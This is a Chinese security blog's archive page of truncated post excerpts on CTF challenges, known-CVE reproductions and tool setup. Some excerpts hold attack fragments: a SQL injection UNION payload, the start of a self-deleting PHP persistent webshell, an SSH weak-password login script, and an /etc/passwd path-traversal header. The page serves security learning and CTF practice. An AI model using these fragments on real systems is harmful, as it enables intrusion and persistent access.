05 2022 档案

摘要:签到题:一张简单图片 在线网址查看源代码 https://tools.yum6.cn/Tools/view_source/index.php 或者将图片下载到本地,查看十六进制发现最后面有一串HTML代码 解密一下 仙剑奇侠传-翻牌游戏 查看源码看到有三个可跳转文件 在 css/style.css 阅读全文
posted @ 2022-05-19 09:52 NoCirc1e 阅读(124) 评论(0) 推荐(0) 编辑
摘要:比赛地址:https://ctf.show/challenges WEB WEB签到 根据题目可知,要输入三个非0数字,使得结果为114,简单尝试一下就知道这几乎是不可能的,那么只能从程序逻辑上看有没有漏洞可钻了 输入数字可以发现计算公式,输入其他字符会提示Hacker,输入+-*()和数字则不会提 阅读全文
posted @ 2022-05-19 09:44 NoCirc1e 阅读(125) 评论(0) 推荐(0) 编辑
摘要:Kali Linux是基于Debian的Linux发行版,设计用于数字取证操作系统。 方法/步骤 安装PHP环境 apt-get install php php-pear 现在启动SSH、Apache以及MySQL这些服务,手动启动命令如下 service sshd start service ap 阅读全文
posted @ 2022-05-19 07:50 NoCirc1e 阅读(1072) 评论(0) 推荐(0) 编辑
摘要:ext3 题目提示是Linux光盘,附件下载下来 首先了解一下ext3 ext3是第三代扩展文件系统(英语:Third extended filesystem,缩写为ext3),是一个日志文件系统,常用于Linux操作系统。他是很多Linux发行版的默认文件系统。 在Linux上加载 SimpleR 阅读全文
posted @ 2022-05-19 07:48 NoCirc1e 阅读(85) 评论(0) 推荐(0) 编辑
摘要:临时配置IP 注:使用桥接网络请根据宿主机IP地址修改 如出现错误:SIOCADDRT:网络不可达 解决方法:修改网卡配置文件 保存退出,重启后,问题即可解决 重新进行配置 永久配置IP地址 注:使用桥接网络请根据宿主机IP地址修改 在文档最后插入DNS地址 重启网络服务 阅读全文
posted @ 2022-05-19 07:39 NoCirc1e 阅读(172) 评论(0) 推荐(1) 编辑
摘要:Metasploit(MSF)简介 Metasploit是一个免费的、可下载的框架,通过他可以很容易地获取、开发并对计算机软件漏洞实施攻击。他本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D.Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。彷佛一夜之间,任 阅读全文
posted @ 2022-05-19 07:38 NoCirc1e 阅读(193) 评论(0) 推荐(0) 编辑
摘要:萌新认证 加入qq群:372619038 进群喊:萌新码 萌新_密码1 密文: 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 首先16进 阅读全文
posted @ 2022-05-19 07:38 NoCirc1e 阅读(326) 评论(0) 推荐(0) 编辑
摘要:签到题 阅读全文
posted @ 2022-05-19 07:37 NoCirc1e 阅读(45) 评论(0) 推荐(0) 编辑
摘要:1.MSF是一个怎么样的工具? MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具 2.漏洞库是什么东西? 漏洞库是公开的漏洞检索系统 例如:http://www.cnnvd.org.cn/web/vulnerability/querylist.tag 3.MSF中 阅读全文
posted @ 2022-05-19 07:37 NoCirc1e 阅读(620) 评论(0) 推荐(0) 编辑
摘要:描述:举办方不允许自带电脑,所以此文章做一些简单工作 0X01 改SSH密码 官方在给出服务器密码时,很有可能是默认的,需要赶快修改自己的密码并尝试能不能登录别人的靶机 0X02 命令行简单查找后门 find / -name '*.php' | xargs grep -n 'eval' find / 阅读全文
posted @ 2022-05-19 07:36 NoCirc1e 阅读(125) 评论(0) 推荐(0) 编辑
摘要:环境: SSH弱口令 描述:存在某些队伍忘记修改SSH弱口令,尝试使用python脚本连接获取flag import paramiko #paramiko是一个用于做远程控制的模块 import threading #threading模块是Python里面常用的线程模块 def ssh2(ip,u 阅读全文
posted @ 2022-05-19 07:36 NoCirc1e 阅读(97) 评论(0) 推荐(0) 编辑
摘要:一、PyCharm字体放大的设置 File->Settings->Keymap->在搜寻框中输入:increase->Increase Font Size(双击)->在弹出的对话框中选择Add Mouse Shortcut 在弹出的对话框中同时按住Ctrl键和鼠标滚轮向上滑 二、PyCharm字体缩 阅读全文
posted @ 2022-05-19 07:35 NoCirc1e 阅读(417) 评论(0) 推荐(0) 编辑
摘要:我们安装了python2和python3的环境,那么怎么在PyCharm里切换python2和python3呢? 我的默认环境是python3 1.新建一个py文件,输入 print(123) 这是python3的输出语句 2.点击运行里的run运行代码 3.可以看到python3的代码跑起来了,输 阅读全文
posted @ 2022-05-19 07:35 NoCirc1e 阅读(1028) 评论(0) 推荐(0) 编辑
摘要:安装telnetd 安装xinetd 查看服务启动状态 编辑/etc/inetd.conf 在文件末尾加上 defaults { # Please note that you need a log_type line to be able to use log_on_success # and lo 阅读全文
posted @ 2022-05-19 07:33 NoCirc1e 阅读(563) 评论(0) 推荐(0) 编辑
摘要:查看Linux系统发行版本信息 部分Ubuntu系统LTS版本代号 Ubuntu 16.04代号为:xenialUbuntu 17.04代号为:zestyUbuntu 18.04代号为:bionicUbuntu 19.04代号为:discoUbuntu 20.04代号为:focal 修改source 阅读全文
posted @ 2022-05-19 07:32 NoCirc1e 阅读(116) 评论(0) 推荐(0) 编辑
摘要:学习于:https://www.cnblogs.com/Cl0ud/p/13620537.html 一个简单的不死马 <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.config.php'; 阅读全文
posted @ 2022-05-19 07:32 NoCirc1e 阅读(553) 评论(0) 推荐(0) 编辑
摘要:集成开发环境 "集成"二字就是字面意思,集成开发环境整合了编辑器、编译器、链接器,调试,部署,乃至代码版本管理等功能于一体,为了方便程序员编写,编译,调试程序喝部署程序。 编辑器、编译器和链接器 编辑器、编译器和链接器是使用C语言进行开发所需要的三个最基本的工具,而且也是最小的工具集,缺一不可。 从 阅读全文
posted @ 2022-05-19 07:31 NoCirc1e 阅读(369) 评论(0) 推荐(0) 编辑
摘要:我们都知道非常多的文件都仅仅有root有权限来改动,那么在我们平时的开发过程中都建议使用一般账号来登录进行开发。 那么我们怎样切换身份呢。 su su是最简单的身份切换,用su我们能够进行任何用户的切换,一般都是su - username,然后输入password就ok了,可是root用su切换到其 阅读全文
posted @ 2022-05-19 07:31 NoCirc1e 阅读(89) 评论(0) 推荐(0) 编辑
摘要:Polkit是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯:控制决策集中在统一的框架之中,决定低优先级进程是否有权访问高优先级进程。 Polkit在系统层级进行权限控制,提供了一个低优先级进程和高优先级进程进行通讯的系统。和sudo等程序不同,Polkit并没有赋予进 阅读全文
posted @ 2022-05-19 07:30 NoCirc1e 阅读(1863) 评论(0) 推荐(1) 编辑
摘要:在VS中,项目属性 -> C/C++ -> 代码生成 -> 运行库 选项内有四个选项:多线程(/MT)、多线程调试(/MTd)、多线程DLL(/MD)、多线程调试DLL(/MDd)。这个设置代表什么意思?四个选项又是什么意思,有什么区别?接下来详细讨论。 何为C运行库、C++标准库 C标准定义了一系 阅读全文
posted @ 2022-05-19 07:30 NoCirc1e 阅读(692) 评论(0) 推荐(0) 编辑
摘要:Docker概述 Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化。容器是完全使用沙盒机制,相互之间不会有任何接口(类似iPhone的APP)。几乎没有性能开销,可以很容易地在机器和数据中心中运行。 阅读全文
posted @ 2022-05-19 07:29 NoCirc1e 阅读(35) 评论(0) 推荐(0) 编辑
摘要:描述 近日,国外安全团队发布安全公告称,在polkit的pkexec程序中发现了一个本地权限提升漏洞。pkexec应用程序是一个setuid工具,旨在允许非特权用户根据预定义的策略以特权用户身份运行命令。 由于当前版本的pkexec无法正确处理调用参数计数,并最终会尝试将环境变量作为命令执行。攻击者 阅读全文
posted @ 2022-05-19 07:29 NoCirc1e 阅读(527) 评论(0) 推荐(0) 编辑
摘要:reverseMe 下载附件 得到一个颠倒的flag图片 编辑,翻转,得到flag What-is-this 下载附件,是.gz压缩,解压,得到两张图片 使用StegSolve工具的combiner功能将两张图片组合,即可得到flag normal_png 下载附件,得到一个png 扔进WinHex 阅读全文
posted @ 2022-05-19 07:28 NoCirc1e 阅读(43) 评论(0) 推荐(0) 编辑
摘要:Python教你来做冰墩墩 代码如下: import turtle turtle.title('一只冰墩墩') turtle.speed(10.5) # 速度 # 左手 turtle.penup() turtle.goto(177, 112) turtle.pencolor("lightgray") 阅读全文
posted @ 2022-05-19 07:28 NoCirc1e 阅读(40) 评论(0) 推荐(0) 编辑
摘要:AppScan简介 原名watchire Appscan,2007年被IBM收购,成为IBM Appscan。IBM AppScan是一款非常好用且功能强大的Web应用安全测试工具,曾以Watchfire AppScan的名称享誉业界,Rational AppScan可自动化Web应用的安全漏洞评估 阅读全文
posted @ 2022-05-19 07:27 NoCirc1e 阅读(652) 评论(0) 推荐(0) 编辑
摘要:工具说明 Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的Web网络漏洞扫描工具,他通过网络爬虫测试你的网站安全,检测流行安全漏洞。 AWVS可以通过SQL注入攻击、XSS(跨站脚本攻击)、目录遍历、代码执行等漏洞来审核Web应用程序的安全性并输出扫描 阅读全文
posted @ 2022-05-18 09:48 NoCirc1e 阅读(232) 评论(0) 推荐(0) 编辑
摘要:签到题 关注公众号回复关键词 提示flag被隐藏 Ctrl+F搜索flag关键字,发现有一处不回显,查看源代码,得到flag 阅读全文
posted @ 2022-05-18 09:45 NoCirc1e 阅读(18) 评论(0) 推荐(0) 编辑
摘要:web171 比较常规的题目不做讲解了,这里给出payload # 查数据库 -1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ # 阅读全文
posted @ 2022-05-18 09:45 NoCirc1e 阅读(76) 评论(0) 推荐(0) 编辑
摘要:按位运算符是把数字看作二进制来进行计算的。Python中的按位运算法则如下: 下表中变量a为60,b为13,二进制格式如下: a = 0011 1100 b = 0000 1101 a&b = 0000 1100 a|b = 0011 1101 a^b = 0011 0001 ~a = 1100 0 阅读全文
posted @ 2022-05-18 09:43 NoCirc1e 阅读(33) 评论(0) 推荐(0) 编辑
摘要:在Kali中启动Burp Suite时,Burp Suite闪退,很有可能是JDK版本的问题,将openjdk换成Oracle的jdk就可以了,具体命令行操作如下: update-alternatives --config java 此时输入Oracle的jdk编号就可以,我的Oracle的jdk版 阅读全文
posted @ 2022-05-18 09:42 NoCirc1e 阅读(1086) 评论(0) 推荐(0) 编辑
摘要:Ubuntu21.10安装完成之后,默认是没有root账户登录权限的,不过我们可以通过创建的普通用户获取管理员权限,然后修改配置和root账户的密码,最后实现登录root账户,具体操作如下: 以普通用户登录系统,创建root用户的密码 首先sudo提权 然后再为root用户设置密码,输入两次,这样就 阅读全文
posted @ 2022-05-18 09:42 NoCirc1e 阅读(161) 评论(0) 推荐(0) 编辑
摘要:首先介绍一下Kali下JDK1.8的安装过程 准备好JDK安装包 建立目录,将下载的JDK复制过去并解压 配置环境变量 添加以下内容到文件结尾 通知系统java的位置 设置默认JDK 重新载入profile 通过java -version以及javac -version即可查看是否安装完成 接下来安 阅读全文
posted @ 2022-05-18 09:39 NoCirc1e 阅读(500) 评论(0) 推荐(0) 编辑
摘要:Apache HTTP Server项目是为包括UNIX和Windows在内的现代操作系统开发和维护开源HTTP服务器的努力,是Apache基金会开源的一款流行的HTTP服务器。在其2.4.48及以前的版本中,mod_proxy模块存在一处逻辑错误导致攻击者可以控制反向代理服务器的地址,进而导致SS 阅读全文
posted @ 2022-05-18 09:32 NoCirc1e 阅读(590) 评论(0) 推荐(0) 编辑
摘要:Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: 版本等于2.4.49穿越的目录允许被访问,比如配置了<Directory />Require all grant 阅读全文
posted @ 2022-05-18 09:28 NoCirc1e 阅读(207) 评论(0) 推荐(0) 编辑
摘要:Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位 阅读全文
posted @ 2022-05-18 09:27 NoCirc1e 阅读(292) 评论(0) 推荐(0) 编辑
摘要:Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件: AddType text/html .html AddLanguage zh-CN .cn 其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-C 阅读全文
posted @ 2022-05-18 09:25 NoCirc1e 阅读(211) 评论(0) 推荐(0) 编辑
摘要:Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞。 参考 阅读全文
posted @ 2022-05-18 09:23 NoCirc1e 阅读(337) 评论(0) 推荐(0) 编辑
摘要:由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 具体原理请参考: https://www.secpulse.com/archive 阅读全文
posted @ 2022-05-18 09:15 NoCirc1e 阅读(155) 评论(0) 推荐(0) 编辑
摘要:影响版本:Discuz!X ≤3.4 漏洞详情:https://lorexxar.cn/2017/09/30/dz-delete/ 启动环境 执行下列命令部署 Discuz!X 安装环境 访问http://your-ip/install/来安装discuz,数据库地址填写db,其他保持默认即可 漏洞 阅读全文
posted @ 2022-05-18 09:13 NoCirc1e 阅读(98) 评论(0) 推荐(0) 编辑
摘要:zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 漏洞版本 2.2.x3.3.0-3.03 运行环境 执行如下命令启动zabbix 3.0.3: docker-compose up -d 执行命令后,将启动数据库( 阅读全文
posted @ 2022-05-18 09:12 NoCirc1e 阅读(168) 评论(0) 推荐(0) 编辑
摘要:XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RES 阅读全文
posted @ 2022-05-18 09:09 NoCirc1e 阅读(1443) 评论(0) 推荐(0) 编辑
摘要:学习于:https://www.cnblogs.com/bmjoker/p/13508538.html 模板引擎 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html 阅读全文
posted @ 2022-05-18 09:06 NoCirc1e 阅读(238) 评论(0) 推荐(0) 编辑
摘要:Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞(CVE-2021-44228)。 0x01 漏洞简介 Apache Log4j2是一个基于Java的日志记录工具。由于A 阅读全文
posted @ 2022-05-18 08:57 NoCirc1e 阅读(56) 评论(0) 推荐(0) 编辑
摘要:Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。 参考链接: https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unaut 阅读全文
posted @ 2022-05-18 08:54 NoCirc1e 阅读(389) 评论(0) 推荐(0) 编辑
摘要:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 参考链接: https://www.exploit-db.com/exploits/43458/ https 阅读全文
posted @ 2022-05-18 08:53 NoCirc1e 阅读(136) 评论(0) 推荐(0) 编辑
摘要:0x01 查看ssh是否已经开启 sudo ps -e | grep ssh 如果最后返回是sshd,证明ssh已经开启,跳到第四步 0x02 如果没有显示,试着开启ssh服务 sudo systemctl start sshd 如果返回的是命令未找到,证明未安装ssh服务 0x03 安装opens 阅读全文
posted @ 2022-05-18 08:52 NoCirc1e 阅读(529) 评论(0) 推荐(0) 编辑
摘要:ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用 阅读全文
posted @ 2022-05-18 08:51 NoCirc1e 阅读(162) 评论(0) 推荐(0) 编辑
摘要:Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空 阅读全文
posted @ 2022-05-18 08:51 NoCirc1e 阅读(472) 评论(0) 推荐(0) 编辑
摘要:原理 参考:http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{valu 阅读全文
posted @ 2022-05-18 08:50 NoCirc1e 阅读(36) 评论(0) 推荐(0) 编辑
摘要:影响版本: 2.0.0 - 2.2.3 漏洞详情: http://struts.apache.org/docs/s2-007.html 测试环境搭建 docker-compose build docker-compose up -d 原理 参考 http://rickgray.me/2016/05/ 阅读全文
posted @ 2022-05-18 08:49 NoCirc1e 阅读(85) 评论(0) 推荐(0) 编辑
摘要:影响版本: 2.1.0 - 2.3.1.1 漏洞详情:http://struts.apache.org/docs/s2-009.html 测试环境搭建 docker-compose build docker-compose up -d 原理 前置阅读: 这个漏洞再次来源于s2-003、s2-005。 阅读全文
posted @ 2022-05-18 08:48 NoCirc1e 阅读(113) 评论(0) 推荐(0) 编辑
摘要:影响版本: 2.1.0 - 2.3.13 漏洞详情:http://struts.apache.org/docs/s2-012.html 测试环境搭建 docker-compose build docker-compose up -d 原理 如果在配置 Action 中 Result 时使用了重定向类 阅读全文
posted @ 2022-05-18 08:46 NoCirc1e 阅读(69) 评论(0) 推荐(0) 编辑
摘要:影响版本: 2.0.0 - 2.3.14.1 漏洞详情: http://struts.apache.org/docs/s2-013.htmlhttp://struts.apache.org/docs/s2-014.html 测试环境搭建 docker-compose build docker-com 阅读全文
posted @ 2022-05-18 08:39 NoCirc1e 阅读(147) 评论(0) 推荐(0) 编辑
摘要:影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 漏洞详情: https://cwiki.apache.org/confluence/display/WW/S2-032https://www.cnblo 阅读全文
posted @ 2022-05-18 08:34 NoCirc1e 阅读(329) 评论(0) 推荐(0) 编辑
摘要:影响版本: 2.0.0 - 2.3.14.2 漏洞详情: http://struts.apache.org/docs/s2-015.html 测试环境搭建 docker-compose build docker-compose up -d 原理与测试 漏洞产生于配置了 Action 通配符 *,并将 阅读全文
posted @ 2022-05-18 08:34 NoCirc1e 阅读(121) 评论(0) 推荐(0) 编辑
摘要:影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 漏洞详情: https://cwiki.apache.org/confluence/display/WW/S2-046https://xz.aliyun.com/t/221 阅读全文
posted @ 2022-05-18 08:33 NoCirc1e 阅读(394) 评论(0) 推荐(0) 编辑
摘要:影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 漏洞详情: http://struts.apache.org/docs/s2-045.htmlhttps://blog.csdn.net/u011721501/article 阅读全文
posted @ 2022-05-18 08:33 NoCirc1e 阅读(124) 评论(0) 推荐(0) 编辑
摘要:Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 影响版本: Struts 2.0.0 - Struts 2.5.20 参考链接: https:// 阅读全文
posted @ 2022-05-18 08:31 NoCirc1e 阅读(171) 评论(0) 推荐(0) 编辑
摘要:影响版本:<=Struts 2.3.34,Struts 2.5.16 漏洞详情: https://cwiki.apache.org/confluence/display/WW/S2-057https://lgtm.com/blog/apache_struts_CVE-2018-11776https: 阅读全文
posted @ 2022-05-18 08:31 NoCirc1e 阅读(114) 评论(0) 推荐(0) 编辑
摘要:Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 参考链接: https://tanzu.vmware.com/secur 阅读全文
posted @ 2022-05-18 08:30 NoCirc1e 阅读(176) 评论(0) 推荐(0) 编辑
摘要:简介 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 主要功能 1.信息搜集: 存活探测(icmp 阅读全文
posted @ 2022-05-18 08:27 NoCirc1e 阅读(594) 评论(0) 推荐(0) 编辑
摘要:Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。 参考链接: https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ 漏洞环境 执行如下命令 阅读全文
posted @ 2022-05-18 08:27 NoCirc1e 阅读(108) 评论(0) 推荐(0) 编辑
摘要:Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 参考链接: 阅读全文
posted @ 2022-05-18 08:26 NoCirc1e 阅读(208) 评论(0) 推荐(0) 编辑
摘要:SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 阅读全文
posted @ 2022-05-18 08:23 NoCirc1e 阅读(46) 评论(0) 推荐(0) 编辑
摘要:Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 参考链接: https://2018.zeronights.ru/wp- 阅读全文
posted @ 2022-05-18 08:23 NoCirc1e 阅读(321) 评论(0) 推荐(0) 编辑
摘要:SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11652 目录遍历漏洞中,攻击者通过构造恶意请求,可以读取、 阅读全文
posted @ 2022-05-18 08:22 NoCirc1e 阅读(107) 评论(0) 推荐(0) 编辑
摘要:在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。 参考链接: https://groups.g 阅读全文
posted @ 2022-05-18 08:20 NoCirc1e 阅读(114) 评论(0) 推荐(0) 编辑
摘要:SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846和CVE-2020-25592两个漏洞,其中CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。组 阅读全文
posted @ 2022-05-18 08:20 NoCirc1e 阅读(123) 评论(0) 推荐(0) 编辑
摘要:phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 参考文档: https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aoghttps://www. 阅读全文
posted @ 2022-05-18 08:18 NoCirc1e 阅读(67) 评论(0) 推荐(0) 编辑
摘要:phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行 阅读全文
posted @ 2022-05-18 08:17 NoCirc1e 阅读(200) 评论(0) 推荐(0) 编辑
摘要:前言工欲善其事,必先利其器,方便好用的浏览器插件可以大大提高我们渗透测试的效率。以下是笔者比较常用的一些插件推荐,其中包含渗透测试、信息收集、代理、加密解密等功能。 Proxy SwitchyOmega 轻松快捷地管理和切换多个代理设置,常用于Google Chrome。 User-Agent Sw 阅读全文
posted @ 2022-05-18 08:16 NoCirc1e 阅读(497) 评论(0) 推荐(0) 编辑
摘要:OpenSMTPD 是面向 unix 操作系统 (BSD, MacOS, GNU/Linux) 的一个 smtp 服务程序,遵循 RFC 5321 SMTP 协议,OpenSMTPD 最初是为 OpenBSD 操作系统开发的,是 OpenBSD 项目的一部分,由于其开源的特性,进而分发到了其他 un 阅读全文
posted @ 2022-05-18 08:16 NoCirc1e 阅读(468) 评论(0) 推荐(0) 编辑
摘要:Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应 阅读全文
posted @ 2022-05-18 08:14 NoCirc1e 阅读(142) 评论(0) 推荐(0) 编辑
摘要:漏洞原理 node-postgres在处理类型为Row Description的postgres返回包时,将字段名拼接到代码中。由于没有进行合理转义,导致一个特殊构造的字段名可逃逸出代码单引号限制,造成代码执行漏洞。 参考链接: https://www.leavesongs.com/PENETRAT 阅读全文
posted @ 2022-05-17 17:57 NoCirc1e 阅读(268) 评论(0) 推荐(0) 编辑
摘要:漏洞原理 参考文档: https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ https://security.tencent.com/index.php/blog/msg/121 原因是 Node.js 8. 阅读全文
posted @ 2022-05-17 17:56 NoCirc1e 阅读(207) 评论(0) 推荐(0) 编辑
摘要:Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。 参考链接: https://support.sonatype.com 阅读全文
posted @ 2022-05-17 17:55 NoCirc1e 阅读(586) 评论(0) 推荐(0) 编辑
摘要:Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。 参考链接: https://support.sonatype.com/hc/en-us/articles/3600 阅读全文
posted @ 2022-05-17 17:55 NoCirc1e 阅读(241) 评论(0) 推荐(0) 编辑
摘要:Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。 参考链接: http 阅读全文
posted @ 2022-05-17 17:55 NoCirc1e 阅读(317) 评论(0) 推荐(0) 编辑
摘要:JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的标准,Mojarra是一个实现了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行加密,进而导致攻击者可以构造恶意的序列化ViewState对象对服务器进行攻击。 参 阅读全文
posted @ 2022-05-17 17:54 NoCirc1e 阅读(656) 评论(0) 推荐(0) 编辑
摘要:mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 漏洞环境 执行如下命令启动一个0.53.0版本的mongo-express: 阅读全文
posted @ 2022-05-17 17:54 NoCirc1e 阅读(245) 评论(0) 推荐(0) 编辑
摘要:Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15和6.6.1之前的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。 参考链接: https://nvd.nist.gov/vuln/detail/CVE-2019 阅读全文
posted @ 2022-05-17 17:51 NoCirc1e 阅读(253) 评论(0) 推荐(0) 编辑
摘要:这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 参考文档: https://foxglovesecurity.com/2015 阅读全文
posted @ 2022-05-17 17:50 NoCirc1e 阅读(271) 评论(0) 推荐(0) 编辑
摘要:ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 参考链接: https://imagetragick.comhttps:/ 阅读全文
posted @ 2022-05-17 17:50 NoCirc1e 阅读(141) 评论(0) 推荐(0) 编辑
摘要:gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本及以前,存在一处命令参数注入问题,可以导致远程命令执行漏洞。 环境搭建 执行如下命令启动漏洞环境: docker-compose up -d 环境启动后,访问http://your-ip:8080将看到一个名为examp 阅读全文
posted @ 2022-05-17 17:49 NoCirc1e 阅读(546) 评论(0) 推荐(0) 编辑
摘要:GitLab是一款Ruby开发的Git项目管理平台。在11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执行任意命令。 参考链接: https://hack 阅读全文
posted @ 2022-05-17 17:47 NoCirc1e 阅读(311) 评论(0) 推荐(0) 编辑
